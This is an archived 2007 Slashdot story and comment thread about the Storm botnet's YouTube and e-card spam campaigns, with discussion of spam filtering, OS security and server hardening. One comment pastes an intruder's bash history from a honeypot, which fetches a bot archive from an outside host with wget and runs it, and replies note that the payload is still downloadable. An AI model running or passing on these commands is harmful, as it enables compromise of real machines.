Forgot your password?
typodupeerror
Security Spam

Storm Botnet Is Behind Two New Attacks 226

Posted by kdawson
from the do-not-click-here dept.
We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.
This discussion has been archived. No new comments can be posted.

Storm Botnet Is Behind Two New Attacks

Comments Filter:
  • by Jennifer York (1021509) on Sunday August 26, 2007 @11:59AM (#20363023) Homepage
    I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did so us that we need to upgrade our infrastructure.

    I fscking hate SPAM!

    • I definitely started to get these "face is all over 'net" SPAMs at about that point in time...I've been getting a few per day since.
    • This Slashdot entry, itself, appears to be spam. Neither link provides any information that anyone who's gotten one of these mails didn't already know.

      Neither blog provides proof, forensic details, or anything even remotely interesting to a geek seeking out "news for nerds." Just the bare necessary to make it look like it's a well-meaning tech link and not a scheme to inflate someone's page views.

      All they are is a couple of paragraphs saying, "Hey, you know all those new spam messages you're getting? The
      • On the contrary. This is another article for me to print for the PHB, telling him why I have had some much time over the last month.

        It is also a peer bonding thing, like "It burns when I pee." "Hey, it burns when I pee as well!"
    • Considering that the post contains a link to a page that has a link to the trojan, I think we can all expect the trojan to be even more prevelant by Monday. Not sure who to be more upset with at this point: the people that wrote it, John Pospisil for posting a live link to the infected page (seriously, remove the href already), or kdawson for linking to Pospisil.
    • It may behoove you to invest in some services from Postini rather than spend money on more infrastructure. They handle such massive spam mail volumes with relative ease and their customer support is top-notch when a rare spam happens to slip through.
  • Skynet... (Score:3, Funny)

    by Colin Smith (2679) on Sunday August 26, 2007 @12:00PM (#20363041)
    It's looking for more processing power...

    http://www.emhsoft.com/singularity/ [emhsoft.com]

    YKIMS!

     
    • Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time.

      But noooo, they have to be all evilly criminal types, don't they.

      • by bmo (77928)
        "Imagine if they put this botnet to a real use, like Seti@Home."

        I thought about doing this for folding@home (cure cancer with a virus!), but once you get mondo points, someone's going to ask if you have _legitimate_ access to all those computers. Vijay likes to keep everything above board.

        As for seti@home, I'd run it if it wasn't for the idea that I have that as communication gets more advanced, the less there is reliance on sending analogue electromagnetic waves hither and yon through the aether. SETI
        • The term Analogue or Digital is not so relevant. There is a visible energy lobe for just about every transmission type, even spread spectrum is obvious and usually well above the noise floor on just about any low end spec/an. TV might fully go the way of copper or fiber, but there are still millions upon millions of other uses for radio. Look how wide spread WiFi has become in just a few short years. You only need a few milliwatts of power on the right frequency to be picked up by satellite. RADAR pumping o
          • by Torvaun (1040898)
            The problem isn't detection, it's interpretation. Let's say that someone intercepts some of our traffic. This isn't hard to imagine at all. But it gets considerably more complicated once you start accounting for Doppler and interference, especially if you want to send any sort of meaningful data. Now, you have a massive chunk of encoded data that they have never seen before. It would be like going up to average Joe with the puzzle out of the back of a issue of 2600, and asking him what it says. There'
  • I'm curious just how this works - what does a recipient of this email need to do to get infected?

    First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

    Now, I'd assume noone will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on th
    • Re: (Score:2, Informative)

      Generally, you click the link and it takes you to a page that will try one of many (mostly patched) javascript exploits to install malware on your system. I reverse engineered a few of these pages last week and, while they weren't amazingly clever, it is interesting.

      If that doesn't work, they usually bring up a page saying something like 'If you are seeing this message, please download our secure login software', along with a link.

      I'm surprised they even try something as obvious as this, but I assume that
    • by garcia (6573)
      First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

      Neither SpamAssassin nor GMail's mail filters are nabbing a lot of this stuff at first. I've marked about 15 of them as spam on my website's GMail account and yet similar messages are *still* getting through. I can certainly understand how people are being infected in the first
    • by pe1chl (90186) on Sunday August 26, 2007 @12:41PM (#20363405)
      Yes. But remember, the mail message pretents to be something like an e-card from a friend. You have to click on the link to see the e-card.
      Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
      The next page explains they have to load some software. Not to unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
      Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?

      So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.

      So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
      Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).
      • by Tom (822) on Sunday August 26, 2007 @01:09PM (#20363599) Homepage Journal

        Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
        Exactly. That's as if you had sensors in your clothes to ring a bell every time someone touches you, because he might be a pickpocket. I guarantee you that after one day in the city, you'll turn it off. Or if you can't do that, start to ignore it. Boom, suddenly you are an easier target than you would be without the "alarm system". You got desensitised.

        Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypicThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonsen seyouhearonstartreck - do you now want to disallow it not doing it?"
    • Because the latest one has a message like "I can't believe it is you" or "Look at the drunk chick" and a youtube link. Only by hovering over it, and looking at the bottom of the windows do you see it become an IP address with no other stuff. And after trying for 10 years, I have yet to teach my mother how to do this, why it is important, or what it means. It is actually one of the most cleaver wetware hacks I have seen in years. Too bad it works so well.
  • Arggg! (Score:4, Insightful)

    by JamesRose (1062530) on Sunday August 26, 2007 @12:30PM (#20363285)
    I hate these comments "Damn Microsoft and their inferior security". That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine. Botnets are there to make money, the more machines they infect the more spam they produce, the more money tehy make. If you want to infect machines, you go for Windows because it has by far the most market share, so it returns the biggest profit. So all the people hacking machines aim at Windows, and multi-million dollar businesses solely aimed at hacking Windows, if any other operating system had that much focus given to it, it would collapse in days, so stop with all the shit about MS having bad security, they do quite a good job in the absolute worst circumstances and as a result only the stupid users get infections.

    ~Not AC cause I don't value my karma~
    • Re:Arggg! (Score:5, Insightful)

      by DaleGlass (1068434) on Sunday August 26, 2007 @12:37PM (#20363367) Homepage
      Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

      Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
      • by grommit (97148)

        Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3?

        I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

        • I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

          A good deal of which have ISPs that block outgoing connections on port 25, which isn't a problem for servers.
      • by Sancho (17056)

        Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

        Servers are going to be more highly scrutinized. Where I work, we have multiple IDS watching the network, and bandwidth monitors that watch for spikes. If a host started using up any significant amount of our bandwidth, we'd know, and we'd shut it down. Not so for most home computers. Bot infections can last for years on home computers when the user doesn't know that there's something wrong, or that they need to fix something.

        Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)

        Linux is a kernel. A distribution of Linux could easily have open ports, an

      • Re: (Score:2, Informative)

        by kayditty (641006)
        It's just a matter of philosophy. I used to be a "cracker" and a "DoS kid" on EFNet. I didn't use Windows machines (I also didn't need/use "DDoS" networks*). Most everyone on EFNet used Linux/UNIX machines with high bandwidth connections. Now, Windows nodes with cable modems seem to be a lot more popular. I think the kids on EFNet know a little bit about what they're doing, since I was one of them (but I was never as stupid as most of them seem to be). A few of them went on to become security experts, last
    • the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

      If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?

      Windows is inherently less secure than most of the competition in a number of ways.

      1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
      1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
      2. Windows requires a number of insecure services to run to perform routine operations.
      2a. There is no way to force these services to be run local-only without using a firewall.
      2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
      3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
      3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.

      The idea that any one of these three issues and theor consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.
      • Re: (Score:3, Informative)

        by Anonymous Coward
        IIS 6 has never had a remote root, and it's four years old.
        • Re: (Score:3, Insightful)

          by argent (18001)
          1. The point is that popularity is not the only or even the primary reason why a product can be attacked.
          1a. Back in the old "classic" Mac era the Mac went through a period where it was the prime target for attacks, despite it having a fraction of the market, simply because it had such a huge surface area to attack.
          1b. Apple responded to many exploits (for example, in autorun CDs and floppies) by removing dangerous capabilities.
          1c. Similarly, UNIX systems usually don't come with the "r" suite enabled or oft
    • Homework assignment:

      Do some research and read about when Microsoft first started talking about ActiveX and the response of the industry at that time.

      Hint: The response was unfavorable and mainly for security reasons.

      Extra Credit: Name three Windows exploits that required no user interaction to be successful that existed within the last 5 years.
  • Unless you've got GFI or Symantec Mail Security, I'd suggest setting up IMF. It's a free spam filter included in Exchange 2003 SP2. Below is a link to get you started.

    http://www.petri.co.il/block_spam_with_exchange200 3_imf.htm [petri.co.il]

    Obviously it doesn't prevent the spreading of SPAM, but it doesn't mean you have to live with the incoming onslaught.
  • Interesting Question (Score:3, Interesting)

    by spikedvodka (188722) on Sunday August 26, 2007 @12:56PM (#20363511)
    This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

    From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"

    I can see this type of attack becoming more popular in the future, at least until this question is solved.
  • ... of all mankind. A distributed computing project for the benefit of the human race. Like, cracking blu-ray DRM or something.
  • by nick13245 (681899) on Sunday August 26, 2007 @01:16PM (#20363663)
    For instance, here's a recent attack to my honeypot (Running Slackware Linux)

    root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
    root@zomg:~# cat /home/webmaster/.bash_history
    ssh localhost
    w
    cat /etc/hosts
    cat /proc/cpuinfo
    passwd
    cd /var/tmp
    ks
    l
    sl
    ls
    ls- all
    ls -all
    mkdir " "
    cd " "
    clear
    wget imaginez0r.xhost.ro/botme.tar.gz
    tar zxvf botme.tar.gz
    rm -rf botme.tar.gz
    cd .bot/
    PATH=.:$PATH
    bash

    These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.

    • Re: (Score:3, Interesting)

      by MarkRose (820682)
      Interestingly enough, imaginez0r.xhost.ro/botme.tar.gz is still available for download. Looks like the bot is controlled by IRC.
      • by inKubus (199753) on Sunday August 26, 2007 @11:08PM (#20368085) Homepage Journal
        Yeah, that link is just to an eggdrop-based bot. It connects to the irc channel and probably lets the next layer of the botnet know it's alive. This is one of many tools they use to fully exploit an open box. The bot probably has the ability to remote run commands. That script in the GP looked a lot like a human was doing the typing though, due to spelling errors, etc.

        As far as xhost, You can get a free account [xhost.ro] too :). Storm is pretty scary, and there's bad people out there wanting to use your computing resources illegally.

        Make sure you run logwatch and logrotate and md5 the logs when they rotate (and rotate frequently, like every minute). Then store the checksum somewhere innocent after rotating. Have logwatch automatically check the checksums on all existing logs and report on that also. hosts.deny everything but your own personal IP address (in hosts.allow) on all ports except those you need to do business. SSH ONLY, don't use telnet or other unencrypted connections. Don't allow root to connect from SSH. Don't allow su from ssh (if possible). Compile your own stuff (including your compiler), never run binaries. Use shadow passwords. Put all of your binaries on a read-only mounted partition, with /var /tmp on a read/write (this is pretty good to do if you have a stable setup, such as a web server). If you can't do that, break your services into virtualized boxes using Xen or VMware or something so you can quickly recover from a saved image if something does happen. Regularly nmap, nessus and satan your box for holes. Put a passive hardware sniffer between your box and the 'net to look for suspicious packets. Etc.

        Most of this is duh stuff and easy to do, and you should have it written in your procedures for building a new box. I believe the NSA has some guidelines also.
  • social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video.

    I don't normally get much spam - maybe one every other week, but I've gotten two of those lately

    OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105])

    and

    LMAO, I cant believe you put this video online.
  • by quokkapox (847798) <quokkapox@gmail.com> on Sunday August 26, 2007 @01:29PM (#20363783)

    You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).

    These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.

    But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.

    People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.

    All you have to do is click on one really bad link. Sometimes, not even that.

    This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.

    • by MrMr (219533) on Sunday August 26, 2007 @03:07PM (#20364625)
      On the planet where I live, people are obliged to take practical and theoretical exams, to buy insurance for damage they may cause to others, and still the streets are full of armed government officials to make sure none of the hundreds of detailed rules are broken. This is considered a sane precaution to reduce road traffic accidents.
      Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".
    • by Kjella (173770)
      You talk as if this is an unsolved problem. There's a range of solutions that could be used from using two-factor authentication, a non-networked computer, a "no-play" locked down computer where you don't block everything in firewall and don't install anything funny or even surf around, a webTV like device sold by online banks or any other number of variations. People don't want it, they want to do everything on their general purpose machine, which tells me it doesn't happen often enough or doesn't hurt eno
    • by thogard (43403)
      Many of the safety features you mention are there because of UL. UL is a lab set up by insurance companies to encourage safer products to save the insurance company money.

      I wonder what will happen if a bunch of insurance companies all got hit with suites going after home owner liability insurance payoffs. Would the insurance companies then got after MS or would they just force all insured home owners to run the latest version of their favorite corps bad anti-virus code?
  • After all this time and all these spams, isn't it fairly reasonable to assume that nearly everyone who is going to get their box owned by the trojan already has?

  • by Nom du Keyboard (633989) on Sunday August 26, 2007 @02:09PM (#20364093)
    Does Storm only attack Windows? Likely yes, I'm sure. Shouldn't Microsoft be attacking this one specifically with their malicious software scanner that's part of every Windows Update?
  • Maybe it's just coincidence, but I've been bombarded with the e-card things for a while now, and the youtube thing for a couple of days or so. Since this story broke on Slashdot, I just checked the spam trap and I haven't had a single one for the last 12 hours or so...
  • Form a team of investigative experts. Find all the machines in a botnet and ask their ISP to disconnect them. If an ISP refuses to cooperate, get their upstream provider involved and start threatening disconnection for all users. They'll soon fall into line.

    Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.
    • I do. We run the WiFi for several hotels. The storm worm traffic is easy to spot. We block them. They call support. A PFY says, "Oh, your 'DELL53476' and you have the storm worm." Then we tell them the closest Fry's or Best Buy. It ain't much, but I stopped 6!
  • Let's call it "Tabula Rasa" day, or since that name is the name of an upcoming game, let's just call it "Global Reformat Day". Everyone in the world reformats their computer on that day.

    Storm what? Yea, that's right, fuck you Storm, we just reformatted every computer connected to the internet today.

    Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.
    • Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.

      The obvious solution is to just direct the botnets to recognize the first Reformat Day automatically.

It was kinda like stuffing the wrong card in a computer, when you're stickin' those artificial stimulants in your arm. -- Dion, noted computer scientist

Working...